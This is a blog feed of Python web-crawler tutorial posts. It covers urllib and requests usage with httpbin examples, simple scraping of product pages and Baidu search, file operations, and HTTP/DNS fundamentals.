    &#39;User-Agent&#39;: &#39;Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)&#39;,
    &#39;Host&#39;: &#39;httpbin.org&#39;
}
form_data = {&#39;name&#39;: &#39;Germey&#39;}
data = bytes(urlencode(form_data), encoding=&#39;utf8&#39;)
req = Request(url=url, data=data, headers=headers, method=&#39;POST&#39;)
response = urlopen(req)
print(response.read().decode(&#39;utf-8&#39;))</code></pre>
<p>For comparison with Request example (2)</p>
<pre><code># For comparison with Request example (2): the same request without custom headers
# (reuses url and data from the previous example)
from urllib.request import Request
from urllib.request import urlopen

req = Request(url=url, data=data, method=&#39;POST&#39;)
response = urlopen(req)
print(response.read().decode(&#39;utf-8&#39;))</code></pre>
<p>Opening a page by building a Request (3): adding headers with add_header</p>
<pre><code># Open a page by building a Request (3): add headers with the add_header method
from urllib.request import Request
from urllib.request import urlopen
from urllib.parse import urlencode

url = &#39;http://httpbin.org/post&#39;
form_data = {&#39;name&#39;: &#39;Germey&#39;}
data = bytes(urlencode(form_data), encoding=&#39;utf8&#39;)
req = Request(url=url, data=data, method=&#39;POST&#39;)
req.add_header(&#39;User-Agent&#39;, &#39;Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)&#39;)
response = urlopen(req)
print(response.read().decode(&#39;utf-8&#39;))</code></pre>
<p>Using urlencode()</p>
<pre><code># Using urlencode()
from urllib.parse import urlencode
from urllib.request import urlopen

data = {&#39;first&#39;: &#39;true&#39;, &#39;pn&#39;: 1, &#39;kd&#39;: &#39;Python&#39;}
data = urlencode(data).encode(&#39;utf-8&#39;)
print(data)
# The original snippet passed an undefined name req here; the httpbin
# endpoint from the earlier examples is assumed instead.
page = urlopen(&#39;http://httpbin.org/post&#39;, data=data).read()
print(page)</code></pre>
<p>Opening a page through a proxy</p>
<pre><code># Using a proxy
from urllib.error import URLError
from urllib.request import ProxyHandler, build_opener

proxy_handler = ProxyHandler({&#39;http&#39;: &#39;106.56.102.140:8070&#39;})
opener = build_opener(proxy_handler)
try:
    response = opener.open(&#39;http://www.baidu.com/&#39;)
    print(response.read().decode(&#39;utf-8&#39;))
except URLError as e:
    print(e.reason)</code></pre>
<h1 id="二、requests"><a href="#二、requests" class="headerlink" title="二、requests"></a>2. requests</h1>
<p>Compared with urllib, requests is much simpler to use, but it has to be installed separately:</p>
<ul><li>On Windows, run pip install requests on the command line.</li><li>On Linux, run sudo pip install requests.</li></ul>
<p>The eight main functions of the requests library</p>
<table><thead><tr><th>Function</th><th>Description</th></tr></thead><tbody><tr><td>requests.request()</td><td>Builds a request; the basis for all the functions below</td></tr><tr><td>requests.get()</td><td>Sends a GET request to a page</td></tr><tr><td>requests.post()</td><td>Sends a POST request to a page</td></tr><tr><td>requests.head()</td><td>Fetches only the headers of a page</td></tr><tr><td>requests.put()</td><td>Sends a PUT request to a page</td></tr><tr><td>requests.options()</td><td>Sends an OPTIONS request to a page</td></tr><tr><td>requests.patch()</td><td>Sends a partial-modification (PATCH) request to a page</td></tr><tr><td>requests.delete()</td><td>Sends a DELETE request to a page</td></tr></tbody></table>
<p>After the request is sent, the server returns its data in a response object. Its main attributes are listed in the table below:</p>
<table><thead><tr><th>Attribute</th><th>Description</th></tr></thead><tbody><tr><td>r.status_code</td><td>Status of the HTTP request; 200 means the request succeeded</td></tr><tr><td>r.text</td><td>The HTTP response body as a string, i.e. the content of the returned page</td></tr><tr><td>r.encoding</td><td>Encoding of the response content as guessed from the HTTP headers</td></tr><tr><td>r.apparent_encoding</td><td>Encoding of the response content as detected from the content itself (a fallback encoding)</td></tr><tr><td>r.content</td><td>The HTTP response body as bytes</td></tr></tbody></table>
<h3 id="requests-request-method-url-kwargs"><a href="#requests-request-method-url-kwargs" class="headerlink" title="requests.request(method, url, **kwargs)"></a>requests.request(method, url, **kwargs)</h3>
<ul><li>method: one of get, post, head, put, options, patch, delete</li><li>url: the address to request</li><li>**kwargs: parameters that control the request, described below:</li><li><ul><li>params: a dictionary or byte sequence appended to the URL as query parameters. It adds key-value pairs to the URL in the form ?key1=value1&amp;key2=value2.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the params keyword argument
import requests

payload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}
r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, params=payload)
print(r.url)
# result: http://httpbin.org/get?key1=value1&amp;key2=value2
print(r.text)
# result:
# {
#   &quot;args&quot;: {
#     &quot;key1&quot;: &quot;value1&quot;,
#     &quot;key2&quot;: &quot;value2&quot;
#   },
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;
#   },
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/get?key1=value1&amp;key2=value2&quot;
# }</code></pre>
<ul><li><ul><li>data: a dictionary, byte sequence, or file object sent as the body of the request, typically when submitting a resource to the server. Unlike params, the data is not appended to the URL; it travels in the request body. A string is also accepted.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the data keyword argument
import requests

payload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}
r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, data=payload)
print(r.url)
# result: http://httpbin.org/post
print(r.text)
# result:
# {
#   &quot;args&quot;: {},
#   &quot;data&quot;: &quot;&quot;,
#   &quot;files&quot;: {},
#   &quot;form&quot;: {
#     &quot;key1&quot;: &quot;value1&quot;,
#     &quot;key2&quot;: &quot;value2&quot;
#   },
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Content-Length&quot;: &quot;23&quot;,
#     &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;
#   },
#   &quot;json&quot;: null,
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/post&quot;
# }</code></pre>
<ul><li><ul><li>json: data in JSON format. JSON is very common in HTTP-based web development and is one of the most frequently used data formats over HTTP. It is sent to the server as the request body.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the json keyword argument
import requests

payload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}
r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, json=payload)
print(r.url)
# result: http://httpbin.org/post
print(r.text)
# result:
# {
#   &quot;args&quot;: {},
#   &quot;data&quot;: &quot;{\&quot;key1\&quot;: \&quot;value1\&quot;, \&quot;key2\&quot;: \&quot;value2\&quot;}&quot;,
#   &quot;files&quot;: {},
#   &quot;form&quot;: {},
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Content-Length&quot;: &quot;36&quot;,
#     &quot;Content-Type&quot;: &quot;application/json&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;
#   },
#   &quot;json&quot;: {
#     &quot;key1&quot;: &quot;value1&quot;,
#     &quot;key2&quot;: &quot;value2&quot;
#   },
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/post&quot;
# }</code></pre>
<ul><li><ul><li>files: a dictionary used to upload files to the server.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the files keyword argument
import requests

# filejiatao.txt contains the text &quot;www.baidu.com www.cctvjiatao.com&quot;
files = {&#39;file&#39;: open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;rb&quot;)}
r = requests.request(&#39;POST&#39;, &#39;http://httpbin.org/post&#39;, files=files)
print(r.url)
# result: http://httpbin.org/post
print(r.text)
# result:
# {
#   &quot;args&quot;: {},
#   &quot;data&quot;: &quot;&quot;,
#   &quot;files&quot;: {
#     &quot;file&quot;: &quot;www.baidu.com www.cctvjiatao.com&quot;
#   },
#   &quot;form&quot;: {},
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Content-Length&quot;: &quot;182&quot;,
#     &quot;Content-Type&quot;: &quot;multipart/form-data; boundary=ee12ea6a4fd2b8a3318566775f2b268f&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;
#   },
#   &quot;json&quot;: null,
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/post&quot;
# }</code></pre>
<ul><li><ul><li>headers: a dictionary of HTTP header fields to send with the request. It lets you customize the HTTP headers, for example to imitate whichever browser you want when accessing the URL.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the headers keyword argument
import requests

payload = {&#39;key1&#39;: &#39;value1&#39;, &#39;key2&#39;: &#39;value2&#39;}
headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;}
r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, params=payload, headers=headers)
print(r.url)
# result: http://httpbin.org/get?key1=value1&amp;key2=value2
print(r.text)
# result:
# {
#   &quot;args&quot;: {
#     &quot;key1&quot;: &quot;value1&quot;,
#     &quot;key2&quot;: &quot;value2&quot;
#   },
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;
#   },
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/get?key1=value1&amp;key2=value2&quot;
# }</code></pre>
<ul><li><ul><li>cookies: a dictionary or CookieJar holding the cookies to send with the request.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the cookies keyword argument
import requests

cookies = dict(cookies_are=&#39;working&#39;)
r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/cookies&#39;, cookies=cookies)
print(r.url)
# result: http://httpbin.org/cookies
print(r.text)
# result:
# {
#   &quot;cookies&quot;: {
#     &quot;cookies_are&quot;: &quot;working&quot;
#   }
# }</code></pre>
<ul><li><ul><li>auth: a tuple, used for HTTP authentication.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the auth keyword argument
import requests

cs_user = &#39;username&#39;
cs_psw = &#39;password&#39;
r = requests.request(&#39;GET&#39;, &#39;https://api.github.com&#39;, auth=(cs_user, cs_psw))
print(r.url)
# result: to be added
print(r.text)
# result: to be added</code></pre>
<ul><li><ul><li>timeout: the timeout in seconds. If the response has not arrived within this time, a timeout exception is raised.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the timeout keyword argument
import requests

r = requests.request(&#39;GET&#39;, &#39;http://github.com&#39;, timeout=0.001)
print(r.url)
# result: fails with a timeout error (socket.timeout: timed out)</code></pre>
<ul><li><ul><li>proxies: a dictionary that sets the proxy servers to use.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the proxies keyword argument
import requests

proxies = {
    &#39;https&#39;: &#39;http://41.118.132.69:4433&#39;
}
# Proxies can also be set through environment variables:
# export HTTP_PROXY=&#39;http://10.10.1.10:3128&#39;
# export HTTPS_PROXY=&#39;http://10.10.1.10:1080&#39;
r = requests.request(&#39;GET&#39;, &#39;http://httpbin.org/get&#39;, proxies=proxies)
print(r.url)
# result: http://httpbin.org/get
print(r.text)
# result:
# {
#   &quot;args&quot;: {},
#   &quot;headers&quot;: {
#     &quot;Accept&quot;: &quot;*/*&quot;,
#     &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,
#     &quot;Connection&quot;: &quot;close&quot;,
#     &quot;Host&quot;: &quot;httpbin.org&quot;,
#     &quot;User-Agent&quot;: &quot;python-requests/2.19.1&quot;
#   },
#   &quot;origin&quot;: &quot;1.203.183.95&quot;,
#   &quot;url&quot;: &quot;http://httpbin.org/get&quot;
# }</code></pre>
<ul><li><ul><li>verify: a switch that controls SSL certificate verification; defaults to True.</li></ul></li></ul>
<pre><code>## request(method, url, **kwargs) with the verify keyword argument (SSL certificate verification)
import requests

r = requests.request(&#39;GET&#39;, &#39;https://kyfw.12306.cn/otn/&#39;, verify=True)
print(r.text)
r = requests.request(&#39;GET&#39;, &#39;https://kyfw.12306.cn/otn/&#39;, verify=False)
print(r.text)
r = requests.request(&#39;GET&#39;, &#39;https://github.com&#39;, verify=True)
print(r.text)</code></pre>
<ul><li><ul><li>allow_redirects: a switch that controls whether redirects are followed; defaults to True.</li></ul></li><li><ul><li>stream: a switch that controls whether the response body is downloaded immediately. The parameter defaults to False, which means the body is downloaded right away; pass stream=True to defer the download.</li></ul></li><li><ul><li>cert: the path to a local SSL certificate.</li></ul></li></ul>
<h3 id="requests-get-url-params-None-kwargs"><a href="#requests-get-url-params-None-kwargs" class="headerlink" title="requests.get(url, params=None, **kwargs)"></a>requests.get(url, params=None, **kwargs)</h3>
<pre><code># From the official documentation
def get(url, params=None, **kwargs):
    kwargs.setdefault(&#39;allow_redirects&#39;, True)
    return request(&#39;get&#39;, url, params=params, **kwargs)</code></pre>
<h3 id="requests-post-url-data-None-json-None-kwargs"><a href="#requests-post-url-data-None-json-None-kwargs" class="headerlink" title="requests.post(url, data=None, json=None, **kwargs)"></a>requests.post(url, data=None, json=None, **kwargs)</h3>
<pre><code># From the official documentation
def post(url, data=None, json=None, **kwargs):
    return request(&#39;post&#39;, url, data=data, json=json, **kwargs)</code></pre>
<h3 id="requests-head-url-kwargs"><a href="#requests-head-url-kwargs" class="headerlink" title="requests.head(url, **kwargs)"></a>requests.head(url, **kwargs)</h3>
<pre><code># From the official documentation
def head(url, **kwargs):
    kwargs.setdefault(&#39;allow_redirects&#39;, False)
    return request(&#39;head&#39;, url, **kwargs)</code></pre>
<h3 id="requests-options-url-kwargs"><a href="#requests-options-url-kwargs" class="headerlink" title="requests.options(url, **kwargs)"></a>requests.options(url, **kwargs)</h3>
<pre><code># From the official documentation
def options(url, **kwargs):
    kwargs.setdefault(&#39;allow_redirects&#39;, True)
    return request(&#39;options&#39;, url, **kwargs)</code></pre>
<h3 id="requests-put-url-data-None-kwargs"><a href="#requests-put-url-data-None-kwargs" class="headerlink" title="requests.put(url, data=None, **kwargs)"></a>requests.put(url, data=None, **kwargs)</h3>
<pre><code># From the official documentation
def put(url, data=None, **kwargs):
    return request(&#39;put&#39;, url, data=data, **kwargs)</code></pre>
<h3 id="requests-patch-url-data-None-kwargs"><a href="#requests-patch-url-data-None-kwargs" class="headerlink" title="requests.patch(url, data=None, **kwargs)"></a>requests.patch(url, data=None, **kwargs)</h3>
<pre><code># From the official documentation
def patch(url, data=None, **kwargs):
    return request(&#39;patch&#39;, url, data=data, **kwargs)</code></pre>
<blockquote><p>requests.patch is similar to requests.put.<br> The difference: with patch, only the fields to be modified need to be submitted.<br> With put, all fields must be submitted to the URL together, and any field left out is deleted.<br> The advantage of patch is that it saves network bandwidth.</p></blockquote>
<h3 id="requests-delete-url-kwargs"><a href="#requests-delete-url-kwargs" class="headerlink" title="requests.delete(url, **kwargs)"></a>requests.delete(url, **kwargs)</h3>
<pre><code># From the official documentation
def delete(url, **kwargs):
    return request(&#39;delete&#39;, url, **kwargs)</code></pre>
<h3 id="requests库的异常"><a href="#requests库的异常" class="headerlink" title="requests库的异常"></a>Exceptions in the requests library</h3>
<p>requests can raise exceptions, for example on connection errors, HTTP errors, redirect errors, and request timeouts. A successful call also does not guarantee a good page, so we need to check whether r.status_code is 200. How do we handle all of this in one place?<br> We can call r.raise_for_status(), which inspects r.status_code and raises an HTTPError when the status indicates a client or server error (4xx or 5xx).<br> This gives us a general-purpose code frame for fetching a page:</p>
<pre><code>import requests

# url is the address of the page to fetch
try:
    r = requests.get(url, timeout=30)  # request timeout of 30 seconds
    r.raise_for_status()  # raise an exception on a 4xx or 5xx status
    r.encoding = r.apparent_encoding  # set the encoding
    print(r.text)
except requests.RequestException:
    print(&quot;An exception occurred&quot;)</code></pre>
<h1 id="三、requests的综合小实例"><a href="#三、requests的综合小实例" class="headerlink" title="三、requests的综合小实例"></a>3. Small end-to-end examples with requests</h1>
<h3 id="实例一：京东商品信息的爬取"><a href="#实例一：京东商品信息的爬取" class="headerlink" title="实例一：京东商品信息的爬取"></a>Example 1: Fetching JD.com product information</h3>
<pre><code>## Fetching JD.com product information
# The page can be fetched without changing any request headers
import requests

url = &#39;http://item.jd.com/2967929.html&#39;
try:
    r = requests.get(url, timeout=30)
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    print(r.text[:1000])  # part of the page
except requests.RequestException:
    print(&quot;Failed&quot;)</code></pre>
<h3 id="实例二：亚马逊商品信息的爬取"><a href="#实例二：亚马逊商品信息的爬取" class="headerlink" title="实例二：亚马逊商品信息的爬取"></a>Example 2: Fetching Amazon product information</h3>
<pre><code>## Fetching Amazon product information
# This site restricts crawlers, so the request has to look as if it came from a browser
import requests

url = &#39;http://www.amazon.cn/gp/product/B01M8L5Z3Y&#39;
try:
    kv = {&#39;User-Agent&#39;: &#39;Mozilla/5.0&#39;}
    r = requests.get(url, headers=kv)  # override the default request headers
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    print(r.text[1000:2000])  # part of the page
except requests.RequestException:
    print(&quot;Failed&quot;)</code></pre>
<h3 id="实例三：百度搜索关键字提交"><a href="#实例三：百度搜索关键字提交" class="headerlink" title="实例三：百度搜索关键字提交"></a>Example 3: Submitting a search keyword to Baidu</h3>
<pre><code>## Submitting a search keyword to Baidu
# Baidu&#39;s keyword interface: https://www.baidu.com/s?wd=keyword
import requests

keyword = &#39;python&#39;
try:
    kv = {&#39;wd&#39;: keyword}
    headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36&quot;}
    r = requests.get(&#39;https://www.baidu.com/s&#39;, params=kv, headers=headers)
    r.raise_for_status()
    r.encoding = r.apparent_encoding
    # print(len(r.text))
    print(r.text)
except requests.RequestException:
    print(&quot;Failed&quot;)</code></pre>
<h3 id="实例四：网络图片的爬取"><a href="#实例四：网络图片的爬取" class="headerlink" title="实例四：网络图片的爬取"></a>Example 4: Downloading an image from the web</h3>
<pre><code>## Downloading an image from the web
import os

import requests

try:
    url = &quot;https://odonohz90.qnssl.com/library/145456/bb0b3faa7a872d012bb4c57256b47585.jpg?imageView2/2/w/1000/h/1000/q/75&quot;  # image address
    root = r&quot;D:\DataguruPyhton\PythonSpider\lesson3\pic\\&quot;
    path = root + url.split(&quot;/&quot;)[-1]
    if not path.endswith(&quot;.jpg&quot;):
        path += &quot;.jpg&quot;
    if not os.path.exists(root):  # create the directory if it does not exist
        os.mkdir(root)
    if not os.path.exists(path):  # download only if the file does not exist yet
        r = requests.get(url)
        with open(path, &quot;wb&quot;) as f:
            f.write(r.content)
        print(&quot;File downloaded successfully&quot;)
    else:
        print(&quot;File already exists&quot;)
except (requests.RequestException, OSError):
    print(&quot;Download failed&quot;)</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
            <tag> requests </tag>
            
            <tag> urllib </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawler in Practice, Part 2: Environment Setup, Basic Syntax, and File Operations</title>
      <link href="/Coderzgh.github.io/2019/05/12/python-crawler-basic-oper-2/"/>
      <url>/Coderzgh.github.io/2019/05/12/python-crawler-basic-oper-2/</url>
      
        <content type="html"><![CDATA[<h1 id="一、Python的环境部署"><a href="#一、Python的环境部署" class="headerlink" title="一、Python的环境部署"></a>1. Setting Up the Python Environment</h1>
<p>Installing Python and a Python IDE is not covered here; plenty of tutorials are available online.</p>
<p>Libraries every crawler needs: Requests, Selenium, lxml, and Beautiful Soup.</p>
<ul><li>Requests is a third-party HTTP library built on top of urllib3 and released under the Apache 2.0 license.</li><li>Selenium is a test-automation tool that drives a browser to perform actions such as clicking and scrolling. It is very effective for pages rendered by JavaScript.</li><li>lxml is a Python parsing library that supports both HTML and XML, supports XPath, and parses very efficiently.</li><li>Beautiful Soup is a Python library for parsing HTML or XML that makes it easy to extract data from web pages.</li></ul>
<h1 id="二、Python的基础语法"><a href="#二、Python的基础语法" class="headerlink" title="二、Python的基础语法"></a>2. Basic Python Syntax</h1>
<p>See my series of study notes on Python for Kids (《趣学Python——教孩子学编程》):</p>
<p><a href="https://www.jianshu.com/p/69b5c9ee926e" target="_blank" rel="noopener">Python for Kids study notes, Chapters 1-3</a></p>
<p><a href="https://www.jianshu.com/p/00850c80f78f" target="_blank" rel="noopener">Python for Kids study notes, Chapters 4-6</a></p>
<p><a href="https://www.jianshu.com/p/90d50cc592ed" target="_blank" rel="noopener">Python for Kids study notes, Chapters 7-8</a></p>
<p><a href="https://www.jianshu.com/p/885cb1fa9827" target="_blank" rel="noopener">Python for Kids study notes, Chapters 9-10</a></p>
<p><a href="https://www.jianshu.com/p/48715dcb524a" target="_blank" rel="noopener">Python for Kids study notes, Chapters 11-12</a></p>
<p><a href="https://www.jianshu.com/p/c9850ca89b60" target="_blank" rel="noopener">Python for Kids study notes, Chapter 13</a></p>
<h1 id="三、Python文件的读取与输出"><a href="#三、Python文件的读取与输出" class="headerlink" title="三、Python文件的读取与输出"></a>3. Reading and Writing Files in Python</h1>
<p>Keyboard input</p>
<pre><code># Keyboard input (Python 3 merged raw_input into input, so only input remains)
text = input(&quot;Please enter:&quot;)
print(&quot;You entered:&quot;, text)</code></pre>
<p>Opening a file</p>
<pre><code># Open a file
# Note: mode &quot;wb&quot; creates the file, or truncates it if it already exists
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;wb&quot;)
print(&quot;File name:&quot;, fo.name)
print(&quot;Closed:&quot;, fo.closed)
print(&quot;Access mode:&quot;, fo.mode)</code></pre>
<p>Closing a file</p>
<pre><code># Close a file
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;wb&quot;)
fo.close()
print(&quot;Closed:&quot;, fo.closed)</code></pre>
<p>Writing to a file</p>
<pre><code># Write content to a file
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)
fo.write(&quot;www.baidu.com www.cctvjiatao.com&quot;)
fo.flush()
fo.close()</code></pre>
<p>Reading from a file</p>
<pre><code># Read the first 11 characters of a file
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)
text = fo.read(11)
print(&quot;String read:&quot;, text)
fo.close()</code></pre>
<p>Finding the current position</p>
<pre><code># Find the current position
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)
text = fo.read(11)
position = fo.tell()
print(&quot;Current file position:&quot;, position)
# result: Current file position: 11
fo.close()</code></pre>
<p>Repositioning the file pointer</p>
<pre><code># Reposition the file pointer
fo = open(r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;, &quot;r+&quot;)
text = fo.read(11)
print(&quot;String 1:&quot;, text)
# result: String 1: www.baidu.c
position = fo.tell()
print(&quot;Current file position:&quot;, position)
# result: Current file position: 11
text = fo.read(11)
print(&quot;String 2:&quot;, text)
# result: String 2: om www.cctv
position = fo.seek(0, 0)  # move back to the start of the file
text = fo.read(11)
print(&quot;String 3:&quot;, text)
# result: String 3: www.baidu.c
fo.close()</code></pre>
<p>Renaming a file</p>
<pre><code># Rename a file: filejiatao.txt -&gt; filejiatao2.txt
import os

src_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao.txt&quot;
dst_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao2.txt&quot;
os.rename(src_file, dst_file)</code></pre>
<p>Deleting a file</p>
<pre><code># Delete a file
import os

dirty_file = r&quot;D:\DataguruPyhton\PythonSpider\lesson2\filejiatao2.txt&quot;
os.remove(dirty_file)</code></pre>
<p>Exception handling 1</p>
<p><img src="https:////upload-images.jianshu.io/upload_images/2255795-71be88200641b051.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/627" alt="img"></p><p>2-1.jpg</p>
<pre><code># Exception handling 1: try / except / else
try:
    fh = open(&quot;testfile.txt&quot;, &quot;w&quot;)
    fh.write(&quot;this is my test file for exception handling!&quot;)
except IOError:
    print(&quot;Error: can&#39;t find file or read data&quot;)
else:
    # runs only if no exception was raised
    print(&quot;Written content in the file successfully&quot;)
    fh.close()</code></pre>
<p>Exception handling 2</p>
<pre><code># Exception handling 2: try / finally
try:
    fh = open(&quot;testfile.txt&quot;, &quot;w&quot;)
    fh.write(&quot;this is my test file for exception handling!&quot;)
finally:
    # the finally block always runs, whether or not an exception was raised
    print(&quot;Error: I don&#39;t know why ...&quot;)</code></pre>
<p>Exception handling 3</p>
<pre><code># Exception handling 3: capture the exception object
def temp_convert(var):
    try:
        return int(var)
    # Python 2 syntax, no longer valid in Python 3:
    # except ValueError,Argument:
    #     print(&quot;The argument does not contain numbers\n&quot;,Argument)
    except ValueError as Argument:
        print(&quot;The argument does not contain numbers\n&quot;, Argument)


temp_convert(&quot;xyz&quot;)</code></pre>]]></content>
      
      
      <categories>
          
          <category> Python </category>
          
      </categories>
      
      
        <tags>
            
            <tag> Python </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Python Web Crawler in Practice, Part 1: Theoretical Foundations of Web Crawlers</title>
      <link href="/Coderzgh.github.io/2019/05/11/python-crawler-basic-internet-1/"/>
      <url>/Coderzgh.github.io/2019/05/11/python-crawler-basic-internet-1/</url>
      
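        <content type="html"><![CDATA[<h1 id="一、浏览网页的基本过程和通信基础"><a href="#一、浏览网页的基本过程和通信基础" class="headerlink" title="一、浏览网页的基本过程和通信基础"></a>1. The Basic Process of Browsing a Web Page and Communication Fundamentals</h1>
<blockquote><p>When we type <a href="http://www.baidu.com" target="_blank" rel="noopener">http://www.baidu.com</a> into the browser's address bar and press Enter, the browser displays the Baidu home page. What actually happens on the network during this exchange?</p></blockquote>
<p>Put simply, the process consists of four steps:</p>
<ol><li>The browser looks up the IP address for the domain name through a DNS server;</li><li>It sends a request to the web server at that IP address;</li><li>The web server responds to the request and sends back an HTML page;</li><li>The browser parses the HTML content and displays it.</li></ol>
<h3 id="DNS"><a href="#DNS" class="headerlink" title="DNS"></a>DNS</h3>
<ul><li>DNS stands for Domain Name System (or Domain Name Service). It consists of resolvers and domain name servers.</li><li>A domain name server stores the domain names and corresponding IP addresses of all hosts in its network and can translate a domain name into an IP address.</li><li>Resolving a domain name through DNS typically takes between 10 and 60 milliseconds.</li><li>A domain name must map to an IP address, but an IP address does not necessarily have a domain name.</li></ul>
<h3 id="HTTP和HTTPS"><a href="#HTTP和HTTPS" class="headerlink" title="HTTP和HTTPS"></a>HTTP and HTTPS</h3>
<ul><li>HTTP (HyperText Transfer Protocol) is a method for publishing and receiving HTML pages.</li><li>HTTPS (HyperText Transfer Protocol over Secure Socket Layer) is, simply put, the secure version of HTTP: an SSL layer is added underneath HTTP.</li><li>SSL (Secure Socket Layer) is a security protocol used mainly for the web. It encrypts network connections at the transport layer to keep data transmitted over the Internet secure.</li><li>The default port for HTTP is 80; the default port for HTTPS is 443.</li></ul>
<h3 id="URI与URL"><a href="#URI与URL" class="headerlink" title="URI与URL"></a>URI and URL</h3>
<ul><li>URI: Uniform Resource Identifier.</li><li>URL: Uniform Resource Locator, a way of fully describing the address of a web page or other resource on the Internet.</li><li>Basic format of a URL: scheme://host[:port]/path/.../[?query-string][#anchor]</li></ul>
<h3 id="请求"><a href="#请求" class="headerlink" title="请求"></a>Requests</h3>
<p>A request is sent from the client to the server and has four parts: the request method, the request URL, the request headers, and the request body.</p>
<ul><li>Request method</li></ul>
<p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-fe7eace52135769d.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/751" alt="img"></p><p>  1-1.jpg</p>
<ul><li>Request headers carry additional information for the server to use. The most important ones include Cookie, Referer, and User-Agent.</li></ul>
<p>  <img src="https:////upload-images.jianshu.io/upload_images/2255795-76c4af1982a66838.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/773" alt="img"></p><p>  1-2.jpg</p>
<ul><li>Request body: usually carries the form data of a POST request; for a GET request the body is empty.</li></ul>
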